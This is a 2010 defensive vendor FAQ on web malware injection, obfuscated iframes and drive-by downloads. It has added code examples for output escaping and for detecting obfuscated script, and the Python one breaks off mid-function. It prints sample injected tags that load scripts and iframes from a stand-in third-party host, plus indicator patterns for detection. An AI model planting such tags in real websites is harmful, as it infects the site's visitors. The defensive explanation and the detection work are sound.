
Web Malware Injection FAQ, Version 1.0, February 12, 2010

Web Malware Injection: Frequently Asked Questions (FAQ)

Contents

1. What is a Web application?
2. How are Web applications created?
3. What are the threats to Web applications?
4. What is a hacker?
5. Why are Web applications vulnerable to hackers?
6. What is malware injection (Part I)?
7. What is malware?
8. What is malicious code?
9. In a Web application context, what is injection?
10. Where is the code injected to?
11. What is drive-by downloading?
12. Why was malware injection created?
13. Why does malware injection utilize legitimate websites?
14. Why should website owners care about malware injection?
15. Why is search engine blacklisting a concern?
16. If my website is flagged by Google as malicious, what is the next step?
17. Why does malware injection target Internet users?
18. Why should Internet users care about malware injection?
19. What is social engineering?
20. What is the role of social engineering in malware injection?
21. What is malware injection (Part II)?
22. What are the components of malware injection?
23. How is malicious code injected into a vulnerable web page?
24. What type of malicious code is injected into the vulnerable Web application?
25. What is an iframe?
26. What is JavaScript?
2010 Armorize Technologies Inc. All Rights Reserved 1


27. What is the relevance of iframes and JavaScript in malware injection?
28. What does injected code look like?
29. What happens when a user requests a web page with injected code?
30. What is meant by a browser exploit?
31. What happens once the browser has been exploited?
32. What is malware injection (Part III)?
33. How do I know my website is infecting my customers with malware?
34. When manually testing for malware injection, what precautions are necessary?
35. How do I know my website has been injected?
36. Is there a general format for injected code?
37. How can I tell if my website has injected iframes?
38. How can I tell if my website has injected JavaScript?
39. Are there other means of malware injection besides iframes?
40. How can I tell if my website has injected objects such as Flash or PDFs?
41. How do I know my database has been injected?
42. What other services might a hacker exploit for injection?
43. If my website is injected, is my web server or operating system also compromised?
44. If a web server hosts multiple websites, are they all affected by a single injection?
45. If my website is downloading malware to users, how do I mitigate?
46. If my website is downloading malware to users, how do I remediate?



1. What is a Web application?
A Web application [1] is a software application that is accessed via a web browser over a network such as the Internet. Generally speaking, Web applications provide dynamic web pages that facilitate interaction between Internet users and more complex components that drive applications such as online payment systems, social networking sites or web-based email. Web application technology has boosted online business capabilities and has entered the corporate workplace as a means of reducing the overhead associated with software installed on a per-computer basis.

2. How are Web applications created?
Basic Web applications are typically created using code which the browser renders into a web page. The most typical example of this is HTML (HyperText Markup Language), as used in static websites. HTML combined with multimedia plugins and scripting functionality presents more dynamic functionality to the browser, while Web application development platforms and databases provide business logic and data storage capabilities. This enables the development of complex, feature-rich applications that can be delivered to end users via a web browser.

Figure 1: Basic Web Application Architecture

[1] A Web application can be considered a more complex and feature-rich form of the commonly used term website. Both are accessed from a web browser by an address that takes the http://www.abc.com format. However, it is assumed that a website simply presents pages with static content to a browser, while a Web application has higher-level components for business logic processing and data storage.



No matter what technology is used to create the Web application, it is important to note that all of its features are nothing more than carefully coded statements that the browser processes and presents to the end user. This can be demonstrated using a standard web browser such as Firefox or Internet Explorer. When viewing a web page, on the top menu, click View and then Page Source (Firefox) or Source (IE) to view the actual source code from which the displayed page has been rendered. This is demonstrated in Figure 2.

Figure 2: Web Page with Source Code

3. What are the threats to Web applications?
Web applications present the corporate image to a global audience. The website is the first port of call for anyone looking to learn more about a given company. However, it is also exposed to malicious elements who seek to use this public presence as a means of damaging corporate reputation, stealing resources, or as a point from which to launch Internet-wide attacks on information systems.

4. What is a hacker?
The term hacker has seen many definitions since it was coined over 40 years ago. However, the general consensus nowadays is that hackers are individuals or groups that seek to circumvent security controls in order to compromise the confidentiality, integrity and/or availability of electronic information systems. While there are numerous hacker subclasses with varying technology focus and skill levels, the term hacker is used exclusively throughout this document. It is also assumed that the primary targets of hackers' attention are Web applications.



5. Why are Web applications vulnerable to hackers?
Traditionally, when software applications were deployed, they were protected not only by some form of user credentials but also through physical and network-level separation from the rest of the world. However, with the advent of online business, a more mobile workforce and increased availability requirements, these applications are now hosted on Web-facing servers which are reachable by anyone with a connection to the Internet. The ubiquitous nature and constant exposure of Web applications, combined with the relative immaturity of the technology, makes them particularly vulnerable to repeated and ever-evolving attacks from hackers who comfortably enjoy the anonymity that the Internet provides.

6. What is malware injection (Part I)?
Malware injection is the act of inserting, or injecting, malicious code into a web page so that when Internet users browse the page their computer [2] is infected with malware. It is important to note that the ultimate target of a malware injection attack is rarely the website itself. The hacker generally wants to quietly insert code into the Web application in order to compromise every computer that browses the website. The methods used to inject code, the types of code and the actual malware categories are discussed in more detail throughout this document.

7. What is malware?
Malware is the industry term used to generally describe malicious software, i.e., software that is designed to compromise the confidentiality, integrity or availability of computer systems. The term malware is broader than the better-known expression virus, as it also encompasses worms, Trojan horses, rootkits, spyware, adware, crimeware, robot (botnet) clients, etc. A detailed discussion of these specific terms is beyond the scope of this document. For more information refer to Wikipedia's malware page [3]. It is assumed that malware is unwanted software that installs without the computer user's knowledge or consent and results in activities such as:
- Degraded computer operations;
- Intrusive pop-up windows that may or may not solicit payment for goods and services;
- Spam email promoting unwanted products, services or activities deemed distasteful or even illegal;
- Theft of personal, financial or corporate information; or
- Installation of remote control software that allows hackers to control and monitor computer activities.

[2] Note that the term computer is used here to refer to all platforms used by an average Internet user surfing the web. This could be a desktop computer, laptop, mobile device, smartphone, etc. It is distinct from a server, which is the advanced computing platform used to host the Web application.
[3] http://en.wikipedia.org/wiki/Malware

8. What is malicious code?
Web applications are built upon code that is presented to and rendered in the Web browser. What the Internet user sees when they access their favorite social networking site is simply code that has been processed by the browser to provide the text, graphics, forms, video, audio, etc. that the application developer wants presented. However, it is possible for this code to be used to adversely affect the Web browser. If a hacker can insert his own code prior to the browser processing it, it is possible that he can control what the browser does. Thus it can be said that malicious code, in this context, is Web application code that, when processed by the browser, somehow compromises or controls the browser's actions. It should be noted that this is a very general term and that the specifics of malicious code will be examined in more detail throughout this document.

9. In a Web application context, what is injection?
Many Web applications request user input through mechanisms such as online forms, checkboxes, etc. In an adequately secured Web application, there will be filters in place to ensure that data only enters through these interfaces in a format that actually matches what the application expects. For example, if the application requires numbers in the form of a birth date, it should not accept letters.
Injection is when data enters the application in a way that bypasses these security controls and alters the application's behavior in an unexpected manner.
Injection is commonly used by hackers to insert malicious code into otherwise legitimate web pages. Common injection attacks include:
- Code injection, which is the general name given to attacks where additional code is inserted into the application;
- Command injection, where the hacker inserts system commands with the aim of having the web server accept and process those commands;
- Database injection, where the hacker inserts database commands or queries so that the database processes them and returns a response.



10. Where is the code injected to?
When discussing code injection, it is important to note that there are many possible scenarios and attack methods, as follows:

Figure 3: Malicious code injection paths

(a) In this scenario, the hacker utilizes application form fields to pass unfiltered database queries to the database. He either circumvents database access controls or gains access to the passwords stored in the account database. Once he has control of the database, he can write content that is echoed back when pages are requested.
(b) The hacker exploits additional vulnerable services such as FTP or SMTP. This may be through specific vulnerabilities, through passwords obtained from hacker forums or through social engineering. This gives the hacker access to the server and thus to the application files and code.
(c) The hacker gains direct access to the server operating system (OS) through either a vulnerable service or stolen credentials. Once this access is gained, the hacker has direct access to the application files and code.
(d) In some cases, the hacker may be able to directly compromise the web application itself:
   - If the application requires user input, the hacker may provide data that writes to a file on the local hard drive. In certain cases, it may be possible to include executable data in this input which in turn would either retrieve password data or circumvent access controls.
   - Many web servers are vulnerable by default, either through vulnerabilities that require patching after installation or through default configuration and credentials. For example, many web servers come with a web-based administration console. If a hacker can exploit this web application, he can control the entire web server.
   - Web application files are typically stored within the OS folder structure. In certain web servers, it may be possible to execute an attack such as Path Traversal [4] to browse through the folder structure and access files outside the web application.

11. What is drive-by downloading?
Malware can be downloaded to end-user computers from compromised websites through a number of methods. Traditionally, some user interaction was required, and people were often lured to a website and persuaded to click on a link which resulted in malware downloading and executing on their computers.
However, the term drive-by downloading specifically refers to the case where no end-user interaction is required. It is enough to simply visit the web page that has been injected. There is no requirement to click on any link.
The real severity of this particular type of attack is that it is entirely silent. It quietly downloads malware without the user's knowledge or consent. Generally, website owners have no idea that this attack has occurred and that their website is leading to serious compromise of their own customers' security.
For example, in 2009 a major US newspaper was compromised through an advertisement in its online edition. Internet users browsing the web page hosting the advertisement automatically and unknowingly downloaded malware without having to click on any links.

12. Why was malware injection created?
When malware first came to the fore, the impact was largely disruptive and/or embarrassing. Common impacts included automated mass emailing to all contacts in the infected computer's Outlook address book or insertion of offensive files into stored data. In extreme cases, files were deleted from infected computers, which impacted user productivity and damaged faith in information systems as a corporate tool.


[4] For more information on Path Traversal refer to the Open Web Application Security Project (OWASP): http://www.owasp.org/index.php/Testing_for_Path_Traversal


With the emergence of the Internet, hackers have focused more on Web applications, but even this has had distinct phases, as outlined in Figure 4.

Figure 4: Web Application Attack Complexity vs. Goals

Initial website attacks were directed at the corporation itself, with the primary goal being prominent website defacement and the bragging rights that came with it.
As the Internet became an accepted business tool, attackers changed their focus to e-commerce websites with the intention of stealing information such as credit card numbers from corporate databases.
However, with the advent of Web 2.0, improvements in credit card protection mechanisms and an increasingly wired general population, hackers have realized that end users' PCs represent far easier targets for profit-driven criminal enterprises.
Modern malware activities are typically designed to compromise information stored on Internet users' computers, such as web banking credentials or email, file sharing and social network site passwords.


Attackers are generally affiliated with organized crime and have established a business model based on buying and selling malicious code or active malware with guaranteed antivirus evasion capability. There are even defined price structures for information such as credit card numbers, social networking credentials, social security numbers, etc.

13. Why does malware injection utilize legitimate websites?
Malware developers target vulnerable websites as a route for malware injection for a number of reasons.
Improved perimeter security technologies have made traditional network- and system-level attacks more difficult to execute. But system and network security is not the same as application security. With the advent of Web 2.0, many businesses, in a rush to develop an online presence, have failed to secure their Web applications at the code level. This has provided a new attack avenue for hackers with SQL injection and cross-site scripting (XSS) capabilities.
As Web applications are accessible to both desirable (customers) and undesirable (hackers) Internet users by design, there is essentially an open channel between the untrusted Internet and corporate systems, as illustrated in Figure 5.

Figure 5: Hackers exploit vulnerable Web applications through open ports



By leveraging vulnerable websites, hackers can silently download and execute malware on the computer of every user who accesses the site. Vulnerable websites expose their entire user base, and hackers now have an avenue for distributing malware to thousands or even millions of users.
As the injected website merely serves as a conduit that redirects Internet user computers to malware sites (often via multiple hop points), it is harder for forensic analysis to identify the actual malware source.

14. Why should website owners care about malware injection?
When a vulnerable website is injected in this manner, it becomes a conduit for malware delivery to all computers browsing the site. This malware is typically designed to steal information from computers browsing the infected sites.
The corporate website represents a company's public face. If it is infecting the computers of the very people it is supposed to serve, it cannot be trusted. Without this trust, website traffic will decrease, which in turn will lead to a reduced marketing profile and lost sales opportunities.
If a website develops a reputation as a source of malware, business reputation will be severely impacted. In addition, malware injection will lead to non-compliance with standards such as PCI and may even bring legal consequences if customer confidentiality or privacy has been impacted.
Finally, if a website is downloading malware to computers browsing it, it will be flagged as malicious by search engines such as Google and may eventually be dropped from search query results.

15. Why is search engine blacklisting a concern?
With the advent of Google Safe Browsing and Google's ability to flag sites suspected of being malware sources, the impact of malware injection is growing ever more immediate. If, during a Google index cycle, a website appears to be hosting malware, the site will be flagged. This means that users who access a flagged site via Google will be given an ominous warning similar to that shown in Figure 6.



Figure 6: Google Safe Browsing Flags Websites with Malware

If the website remains infected, it may eventually be dropped completely from Google's search results. Even if the malware is removed from the website immediately, the site will stay flagged for a significant time period, driving customers away. In order to remove this status, website owners must submit proof that their website is malware-free. Websites flagged by Google as malicious are documented at http://www.stopbadware.org.

Given the importance of Search Engine Optimization (SEO) as a marketing tool, there is no doubt that Google flagging a website as malicious, or dropping it from search results, is bad for business.

16. If my website is flagged by Google as malicious, what is the next step?
Once a website has been flagged as malicious by a search engine such as Google, it is critical to remove the injected code in order to stop the drive-by download. For details on identifying injected code refer to question 28. For immediate mitigation steps as well as more thorough remediation refer to questions 45 and 46.
Once the injected code has been removed and it has been verified that malware is no longer being pushed to Internet user computers, it is possible to request a new website review.



Sites flagged by Google as malicious are listed at http://stopbadware.org, and the instructions on requesting a review are at http://stopbadware.org/home/reviewinfo.

17. Why does malware injection target Internet users?
Increased publicity and awareness has made it difficult to compromise corporate resources from the Internet, but an increasingly wired general public is sharing more and more information via the Internet. These Internet users:
- Store personal, business and other sensitive data on computers connected to the Internet.
- Generally trust any website they choose to access, whether browsing directly, accessing via a search engine or clicking on a link sent from a friend.
- Rely on commercial antivirus solutions for security. These are often outdated due to failure to update signatures. In addition, advances in obfuscation and packing techniques mean that much newly released malware initially goes undetected by commercial antivirus scanners.
The result is a massive number of computers holding personal and financial information live on the Internet. They are largely protected by inadequate security mechanisms and are operated by users who implicitly trust websites that are vulnerable to malicious code injection. By leveraging vulnerable websites, hackers now have an avenue for distributing malware to thousands or even millions of users.

18. Why should Internet users care about malware injection?
When Internet users browse to a compromised website, the injected code causes hacker-created content to execute in their browser along with the legitimate website content.
The hacker's ultimate goal is to force the user's computer to silently download and install malware from a site that the hacker specifies. This malware typically grants the hacker full control over the PC, including access to stored, processed or transmitted data.
The impact of malware injection is stolen information such as online banking credentials and credit card details. Theft of personal information in this manner also leads to increased incidences of email hijacking, fraudulent access to social network sites and, in many cases, full-blown identity theft.

19. What is social engineering?



Social engineering revolves around persuading or manipulating people into revealing information or performing specific actions. In a computer security context, social engineering means exploiting people through deception rather than focusing on circumventing technological controls.

20. What is the role of social engineering in malware injection?
If Internet users can be attracted to websites containing hyped content such as celebrity sex tapes or advance movie copies, they become targets for malware injection.
In 2008, sexually explicit photos of Hong Kong movie star Edison Chen with numerous female celebrities were released on the Internet. Armorize Technologies, working with law enforcement and cybersecurity agencies throughout the region, quickly uncovered numerous websites that enticed Internet users with promises of the photos in question but actually subjected them to malware injection. By taking advantage of the hype surrounding the photos, hackers found a massive target base for personal data theft.
In this example, the social engineering served only to bring visitors to the page; beyond that visit there was no requirement for user interaction. The malware download happened invisibly as soon as the browser displayed the expected page.

21. What is malware injection (Part II)?
Having reviewed some concepts critical to an understanding of malware injection, it is time to look a little deeper at how malware injection works.
Malware injection, also known as drive-by downloading, is a hacker technique designed to steal information from Internet users by forcing them to automatically download malicious software without their knowledge or consent.
More specifically, the hacker exploits fundamental Web application vulnerabilities, such as poor application input filtering, in order to inject a malicious iframe or JavaScript into the Web application.
At a very high level, the concept can be illustrated as in Figure 7. However, it should be noted that the process is actually more complex, and this is presented from the perspective of an end user who has been compromised. While the injected Web application may also be on the server hosting the malware, it is more typical for it to act merely as a conduit for malware injection by ensuring the browser processes malicious code that compromises it.



Figure 7: Basic Drive-by Download Concept

22. What are the components of malware injection?
In a typical malware injection scenario, the hacker's end goal is to take control of the end-user computer. At a high level, and in the most typical example, malware injection requires three components, as follows:
- Malicious code: If the website is vulnerable to injection attacks, the hacker will insert code that will be processed by any browser requesting the injected web page. This will cause the browser to request content from another website controlled by the hacker.
- Exploit: The exploit is what actually takes advantage of security flaws in the end user's web browser. If the exploit is successful, the hacker will have full control of the web browser. The exploit is typically downloaded from the website that the injected code redirects the browser to.
- Malware: Once the browser has been exploited, it can be instructed to carry out any action the hacker requests. Typically this includes accessing another hacker-controlled website or server to download active malware.

The overall process can be summarized as follows:
- Injecting a vulnerable website with malicious code that web browsers will process;
- Using this injected code to exploit web browsers and take control of them;
- Forcing the exploited web browser to download malware to Internet users' computers; and
- Silently executing and installing this malware on end-user computers.




The payload of this malware may vary, but it typically includes software that grants the hacker the ability to remotely control the computer, view video output, capture keystrokes and search through the hard disk for data such as credit card numbers and stored credentials for banking, social network and webmail sites.
Note that this list is far from exhaustive. New malware is released weekly with ever more complex behavioral characteristics and goals.

23. How is malicious code injected into a vulnerable web page?
Many Web applications request user input through form fields. That input is then processed, with the results relayed back to the end user.
Web application developers should ensure that data is processed in accordance with the application's business rules and that server, application or database commands cannot be supplied to the application through this avenue. This requires filtering application input to ensure that only data deemed valid in accordance with the application's expectations is accepted. For example, if the application expects numeric data from an input field, then any other type of data should either generate a request for properly formatted data, be replaced with default data or be ignored.
However, many Web applications are developed without these controls in place. It is common for poorly secured Web applications to accept commands through form fields which are then passed to the other back-end systems powering the application, such as the web server, server operating system or database, for processing.
With suitably crafted commands passing through the web form to the core application, server or database, a hacker can freely inject the content required for successful malware injection. Typical injection attacks include the following:
- Full Path Disclosure
- Argument Injection or Modification
- LDAP Injection
- Blind SQL Injection
- Blind XPath Injection
- Parameter Delimiter
- Code Injection
- Server-Side Includes (SSI) Injection
- Command Injection
- Special Element Injection
- Direct Static Code Injection
- Web Parameter Tampering
- Format String Attack
- XPath Injection
For more information on injection attacks refer to the Open Web Application Security Project (OWASP) at http://www.owasp.org/index.php/Category:Injection
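To make the filtering rule concrete, the following is an added example (not code from the original FAQ or from Armorize): a hypothetical guest-book feature that validates a numeric birth-year field as questions 9 and 23 recommend, and then renders stored comments once unsafely and once with HTML escaping at output time, so that an injected iframe pointing at the FAQ's placeholder URL www.example.com/page_with_malware.htm is displayed as text instead of being loaded by the browser (the stored-content path of scenario (a) in question 10). The field names and the sample entries are constructed for the demonstration.

```javascript
// Added example, not from the Armorize FAQ: the input-filtering and
// output-handling controls Q23 describes, on a constructed guest-book
// feature. Field names and entries are assumptions made for the demo.

// Input filtering: accept only what the application expects. Letters,
// quotes and tags are rejected outright; the caller then asks the user
// for properly formatted data instead of storing the bad value.
function validateBirthYear(input) {
  if (typeof input !== "string" || !/^\d{4}$/.test(input)) return null;
  const year = Number(input);
  return year >= 1900 && year <= 2010 ? year : null;
}

// Escape the five characters that matter inside HTML element content.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable rendering: stored text is concatenated straight into the
// page, so a comment containing an iframe is processed by every
// visitor's browser (scenario (a) in Q10).
function renderGuestbookVulnerable(entries) {
  return entries.map((e) => `<li>${e.name}: ${e.comment}</li>`).join("\n");
}

// Hardened rendering: the same stored data is escaped at output time, so
// the browser displays the injected markup as text instead of loading it.
function renderGuestbookSafe(entries) {
  return entries
    .map((e) => `<li>${escapeHtml(e.name)}: ${escapeHtml(e.comment)}</li>`)
    .join("\n");
}

// Does the rendered page contain an iframe the browser would act on?
function containsLiveIframe(html) {
  return /<iframe\b/i.test(html);
}

// Constructed guest-book entries: one legitimate, one injection attempt
// using the FAQ's placeholder malware URL.
const ENTRIES = [
  { name: "alice", comment: "Nice site!" },
  {
    name: "bob",
    comment: '<iframe src="http://www.example.com/page_with_malware.htm" width="1" height="1"></iframe>',
  },
];
```

Two caveats a practitioner would add: the escaping shown is correct only for text placed inside an element's content; data that lands inside an attribute value, a script block or a URL needs the encoder for that context. And input validation does not replace parameterized database queries; the allow-list check on the birth year keeps bad data out, while escaping on output and parameterized queries stop whatever does get stored from being interpreted as code.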



24. What type of malicious code is injected into the vulnerable Web application?
In the most common example, the hacker injects code into the Web application that is rendered in the web browser. The hacker's goal is to have the browser process his code without either the web application administrator's or the end user's knowledge or consent. This is commonly achieved through injection of malicious content such as:
- Iframes
- JavaScript
- Objects
- Database queries or commands

25. What is an iframe?
An inline frame, or iframe, causes an HTML document, possibly from an external domain, to render inside a requested web page. Iframe syntax utilizes the HTML <iframe></iframe> tag and allows specification of a number of parameters such as:
- The actual website from which the iframe content is retrieved;
- The position of the iframe within the overall web page;
- Display dimensions, which can be set to zero; and
- Display status, which can be set to none.
Therefore it is possible to use an iframe to embed content from a third-party website and have it render invisibly in the web browser when an otherwise legitimate web page is requested. A typical iframe simply names the page to load. If an iframe pointing at page.html was inserted into a corporate home page, content from page.html would render when the home page was opened in the browser.

26. What is JavaScript?


JavaScript is a scripting language that is interpreted by Web browsers. It allows Web application developers to control and augment browser functionality and to add dynamic features that cannot easily be achieved through HTML alone. Typically JavaScript functionality includes visual effects, form field validation and the dynamic creation of event dialogs and new windows. It is also possible to use JavaScript to dynamically create iframes. This makes the iframe more difficult to find through rudimentary visual inspection of the page source.

27. What is the relevance of iframes and JavaScript in malware injection?
In malware injection scenarios, hackers take advantage of vulnerable Web applications to inject malicious iframes into otherwise legitimate and typically popular web pages. The injected iframe will either use standard HTML syntax or can be in the form of JavaScript which will dynamically create the iframe when the page is displayed in the browser.

Whatever the injection method, the goal is the same. The iframe causes a 3rd-party web page to render inside the requested web page. This is used to call up an external exploit designed to compromise the web browser that requests that page.

28. What does injected code look like?
The most basic form of injected code is a malicious iframe such as the one shown below. If this iframe is present in the HTML of a requested web page, it would cause content from http://www.example.com/page_with_malware.htm to render in an invisible 1 pixel x 1 pixel window.

However, typically when hackers inject an iframe into a website they may disguise the code by making it look like something else. For example, the injected iframe code can be scrambled or encoded so that visually it looks nothing like the original syntax but acts as normal when executed as a web page.

Note that this does not protect or encrypt the HTML code but simply serves to hide it from someone looking for an iframe. For example, the iframe referenced earlier can be converted to a JavaScript Unicode string using a freely available encoding tool [5]. The process of disguising code through scrambling or encoding is generically referred to as obfuscation.

[5] http://www.auditmypc.com/html-encoder.asp


29. What happens when a user requests a web page with injected code?

In the above example, when an Internet user browses to the injected web page, the JavaScript dynamically generates an iframe. This causes malicious content from a website controlled by the hacker to execute inside the requested (and presumed legitimate) web page.

This hacker-controlled website is often referred to as the Hop Point and contains the actual attack directed at the Web browser. The malware injection process is described in more detail in Figure 8.

In the case of an exploit that is loaded from the Hop Point through the iframe, the target is typically the web browser itself. In one common example, the exploit uses a technique called heap spraying [6]: it fills the browser's memory with many copies of attacker-supplied instructions (shellcode) so that when a memory-corruption flaw is triggered, execution lands in those instructions and the browser carries them out.
[6] A discussion of the heap spray attack is beyond the scope of this document. Refer to http://en.wikipedia.org/wiki/Heap_spraying for more information.


30. What is meant by a browser exploit?
The initial goal of the injected iframe is to render content from a website controlled by the hacker inside the requested web page.

The iframe content typically contains a web browser exploit, i.e., code that exploits software flaws in a web browser in order to force it to do something unexpected such as crashing or reading/writing data on the local hard drive.

Appropriately crafted exploit code will cause the browser to fall under the control of the hacker. It will then accept commands embedded in the exploit and will carry out tasks assigned to it by those commands.

Alternatively, the exploit may be specific to any number of browser extensions such as those that support PDF, Flash, etc. In either case, the goal is to take control of the browser, forcing it to perform tasks specified by the hacker.

31. What happens once the browser has been exploited?
The primary goal of the exploit is to force the web browser to connect to a malicious site in order to download malware such as remote control utilities and backdoors, as well as programs that automatically crawl the hard disk in search of information such as credit card details or bank accounts.

32. What is malware injection (Part III)?
Now that we have reviewed basic and intermediate concepts, we can look in more detail at the malware injection process. A typical malware injection scenario is illustrated in Figure 8.



Figure 8: Malware Injection Process Flow

Step 1: Malicious iframe injection

The hacker takes advantage of Web application vulnerabilities to inject a malicious iframe into one or more web pages. The injection is typically either in HTML code or in JavaScript that dynamically generates the iframe when the browser requests the web page. In addition, the injected code is usually scrambled or encoded to make it more difficult to discover by both automated and manual inspection.

Step 2: Browser exploit placed on Hop Point



In parallel to step 1, the hacker places the exploit code that will attack the browser on the Hop Point website. The injected code in step 1 causes this web page to render in the requested web page.

Step 3: Malware placement

In parallel to steps 1 and 2, the hacker places malware on a server under his control. This malware contains the utilities that will be silently downloaded to the computer of every user that browses the website injected in step 1.

Step 4: Legitimate Web application access

Internet users browse the injected website and request the page that has been injected with a malicious iframe.

Step 5: Malicious iframe execution

When Internet users request the compromised web page, the iframe renders content from the Hop Point. This page contains the exploit code that directly targets the browser or takes advantage of vulnerable browser extensions such as a PDF reader.

Step 6: Exploit

The exploit code from the Hop Point web page is executed in the Web browser via the injected iframe. In one example, the exploit code uses the heap spray [7] technique to take control of the browser. Once the exploit has taken control of the browser, it provides a set of instructions for the browser to execute.

Step 7: Malware request

The exploited browser executes commands issued to it in the exploit code. This includes requesting the malware from a server specified by the hacker.

Step 8: Malware download

The browser silently downloads the malware, which is written to disk and executed.

33. How do I know my website is infecting my customers with malware?
Antivirus is not adequate
[7] A discussion of the heap spray attack is beyond the scope of this document. Refer to http://en.wikipedia.org/wiki/Heap_spraying for more information.


Poorly written malware will set off antivirus alarms on end-user PCs accessing the injected website. While this is embarrassing and damages the corporate reputation, ultimately it will not compromise those clients who have enabled and properly configured their basic desktop security mechanisms.

However, much malware is crafted using obfuscation, encoding and packing techniques specifically so that up-to-date antivirus signatures do not match it. When dealing with this type of malware, signature-based detection is largely ineffective, and the absence of antivirus alerts from customers says nothing about whether the website is serving malware.

Google Safe Browsing API is not adequate

Malware injection causes Internet users to download and execute malware without their knowledge or consent. Without active malware injection monitoring, business owners will only become aware that their website is initiating drive-by downloads when it is flagged by search engines (such as Google) as a source of malware. Once this happens, business reputation will be severely damaged and website traffic will decrease, driving down business revenue and marketing profile.

There are technologies that consolidate malware threat feeds and signatures from Google's malware samples. However, as they are largely reliant on Google's Safe Browsing index, they will rarely alert businesses in time to prevent Google flagging.

Behavioral analysis detects malware injection immediately

The ideal solution is an active malware injection monitoring service such as HackAlert. This behavioral analysis solution scans the website continuously, generating HTTP requests and analyzing HTTP responses for content that exhibits potentially malicious behavior, such as obfuscated redirection to 3rd-party websites or active malware downloads. For more information on HackAlert refer to the HackAlert FAQ.

34. When manually testing for malware injection, what precautions are necessary?
It is important to remember that simply browsing an infected site is enough to compromise a PC. If manual verification is required, a number of safeguards are recommended.

Log on as a non-privileged user

Much of the malware circulating on the Internet requires local administrator rights to run. Simply browsing the Internet while logged on as a non-privileged regular user account can limit the impact of malware. For example, malware running in the context of an administrator can do the following:
- Install kernel-mode rootkits and/or keyloggers (very difficult or impossible to detect)


- Install and start services
- Install ActiveX controls, IE and shell add-ins (common with spyware and adware)
- Access data belonging to other users
- Cause code to run whenever anybody else logs on
- Capture passwords entered into the Ctrl-Alt-Del logon dialog
- Replace OS and other program files with trojan horses
- Access sensitive account information, including account info for domain accounts
- Disable/uninstall antivirus
- Cover its tracks in the event log
- Render the machine unbootable

Use virtual machines

Instead of browsing the website from the host OS, install software such as VMware to create a hardened OS image accessed with non-privileged account credentials. As an added security measure, configure this VM to automatically reset after each use.

Third-party tools

Instead of browsing directly to a website, retrieve the page with command-line tools that fetch the HTML without rendering it or executing its scripts:
- cURL: command-line tool, writes source code to screen or file output
- Wget: command-line website crawler, writes to file (http://daniel.haxx.se/docs/curlvswget.html)

Note that an injected site may serve the malicious content only to requests that look like a real browser (User-Agent, Referer), so compare fetches made with and without browser-like request headers.

Secure the browser

Set browser security to high to prevent unwanted JavaScript from running. Note that this is not going to prevent exploits in downloaded PDFs from running though.

Use Firefox with NoScript (https://addons.mozilla.org/en-US/firefox/addon/722) to only run scripts from sites that have been manually added to a whitelist.

35. How do I know my website has been injected?

In a typical malware injection scenario, a hacker will take advantage of a vulnerable website to inject some form of malicious content that will exploit the web browser when the page is displayed. If a web page is suspected to have been injected, it will be necessary to examine the application code and web server for evidence of:
- Injected iframes
- Injected JavaScript
- Injected objects such as Flash, PDF




- Database injection
- Compromise of other services such as FTP

36. Is there a general format for injected code?
In general, injected Web application code (iframes or JavaScript) will take a format similar to:
<script src=http://unknown-third-party-host.com/load.js > </script>
<script>[obfuscated javascript that contains eval(xyz);]</script>
<iframe src=http://unknown-third-party-host.com/loader.php > </iframe>

37. How can I tell if my website has injected iframes?
There may be a need for iframes in the application, so in manual inspection it is up to the application owner to distinguish the legitimate code from the injected. Automated tools such as Armorize HackAlert enable this, but even with manual inspection there are some tell-tale signs to look for. Refer to the previously discussed iframe, which is shown again below.

In particular, references to 3rd-party websites and obvious efforts to hide the iframe (dimensions set to zero, visibility set to hidden) would indicate injection. This iframe would typically be disguised (or obfuscated) using one of a number of freely available encoding tools [8] to yield the following:

[8] http://www.auditmypc.com/html-encoder.asp


38. How can I tell if my website has injected JavaScript?
In its simplest form, injected JavaScript will show up between <script> tags as:
<script src=http://unknown-third-party-host.com/load.js > </script>

However, it is far more likely that the JavaScript will be encoded or somehow obfuscated to make it less noticeable to either human or automated detection:
<script>[obfuscated javascript that contains eval(xyz);]</script>

For example, the following code snippet is a piece of drive-by download code that exploits MS06-067, a known Microsoft Internet Explorer vulnerability:



This appears as malicious to automated mechanisms as well as to humans. However, if we run this code through an encoding utility such as Dean Edwards' JavaScript compressor [9] we get the results below.

[9] http://dean.edwards.name/packer/


The eval() is what is carrying the malicious code, and the payload is what's contained inside the eval() function. The eval() is suspicious, as are the variable names that have been renamed and the inclusion of "shellcode".

In reality, the hacker would run his code through a number of similar utilities to ensure that it was undetectable both by human inspection and by signature-based malware detection tools.

As a rule, when it comes to assessing malicious JavaScript injection it is necessary to:
- Ensure all clear-text JavaScript is legitimate and is there by design



- Question and examine ALL scrambled, encoded or obfuscated code to determine why it is there and why it has been obfuscated.
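The first step in questioning obfuscated script is to peel the encoding back far enough to see what it writes into the page. The following added example (not code from the original FAQ or from Armorize) does that for the encodings named in this FAQ: JavaScript Unicode escapes, percent-encoding as used with unescape(), and String.fromCharCode lists, then reports the tell-tale indicators found in the decoded text. It never executes the script, so it will not unwind a real packer's runtime logic; a hit on the packer signature is itself the finding. The sample scripts and the host name are constructed.

```python
"""Triage a <script> body for the signs of injected, obfuscated JavaScript.

Added example, not code from the original FAQ. It peels off the encoding
layers injected scripts commonly stack (\\uXXXX and \\xXX escapes, %XX URL
encoding, String.fromCharCode lists) and then looks in the decoded text for
the tell-tales the text names: eval, unescape, document.write, a generated
iframe, a script or iframe pulled from a third-party host, the word
"shellcode" and the Dean Edwards packer signature. It does not execute the
script. The sample scripts and host names are constructed for illustration.
"""
from __future__ import annotations

import re
from urllib.parse import unquote

INDICATORS = {
    "eval": r"\beval\s*\(",
    "unescape": r"\bunescape\s*\(",
    "document.write": r"\bdocument\.write(?:ln)?\s*\(",
    "packer": r"eval\(function\(p,a,c,k,e,[dr]\)",
    "iframe": r"<iframe\b",
    "shellcode": r"shellcode",
    "external src": r"(?:src|href)\s*=\s*[\"']?https?://",
}


def _from_char_code(m: re.Match) -> str:
    """Rebuild the string a String.fromCharCode(n, n, ...) call would produce."""
    return "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1)))


def decode_layer(js: str) -> str:
    """One pass over the encodings; call repeatedly until nothing changes."""
    js = re.sub(r"String\.fromCharCode\(([\d,\s]+)\)", _from_char_code, js)
    js = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), js)
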